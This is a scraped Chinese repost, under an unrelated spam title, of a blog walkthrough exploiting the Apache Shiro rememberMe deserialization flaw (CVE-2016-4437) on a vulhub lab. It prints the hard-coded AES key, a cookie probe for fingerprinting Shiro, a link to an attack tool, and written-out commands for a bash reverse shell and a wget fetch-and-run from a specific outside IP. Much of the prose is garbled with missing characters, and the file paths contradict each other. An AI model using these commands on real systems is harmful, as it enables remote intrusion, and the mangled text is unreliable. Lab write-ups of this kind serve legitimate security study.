当前位置: 首页> 科技> 名企 > 工商营业执照查询网_网络维护管理_湖南seo公司_百度网盘首页

工商营业执照查询网_网络维护管理_湖南seo公司_百度网盘首页

时间:2025/7/18 13:08:23来源:https://blog.csdn.net/2301_78554096/article/details/146487988 浏览次数:0次
工商营业执照查询网_网络维护管理_湖南seo公司_百度网盘首页

Shiro漏洞原

Shiro框架下,陆成后会⼀个CookieCookieKey值为 RememberMeValue值是过序列化AES密和Base64编码后得到的结

端在接收到⼀个Cookie会按照如⾏解析处

  • RememberMe Cookie
  • Base64
  • AES
  • 反序列化操

在第4步中的调⽤反序列化时未进任何过滤可以导致出发远程代漏洞

于使AES功利⽤该漏洞需获取AES的加密密钥Shiro1.2.4版本之AES的加密密钥为硬编码密钥Base64编码值为kPH+bIxk5D2deZiIxcaaaA==于是就可得Payload构造流程

恶意命令-->列化-->AES-->base64编码-->发送Cookie

⽬前通过去掉硬编码的密钥是每次⼀个密钥来解决其漏洞但可以通过搜索密钥提⾼漏洞的利⽤功率

vulhub靶场 /shiro/CVE-2016-4437

 Shiro  rememberMe反序列化漏洞Shiro-550

 打开靶机网址,直接抓包

在请求包中的cookie字段中添加rememberMe=123;,看响应包  header中是否返回rememberMe=deleteMe值,若有,则证明该系统使⽤了Shiro框架

 使用工具shiro_attack-2.2.jar

shiro_attack⼯具https://github.com/j1anFen/shiro_attack

之后使用蚁剑连接就可以了

反弹shell

在云服务器上写一个反弹shell命令到1.sh

bash -i >& /dev/tcp/39.105.61.160/6666 0>&1

nc监听6666端口

 

 使用shiro_attack⼯具

/usr/bin/wget -qO /temp/1.sh http://39.105.61.160/1.sh

ls /tmp 

/bin/bash /tmp/shw.sh 

这样就可以监听到shell 

关键字:工商营业执照查询网_网络维护管理_湖南seo公司_百度网盘首页

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: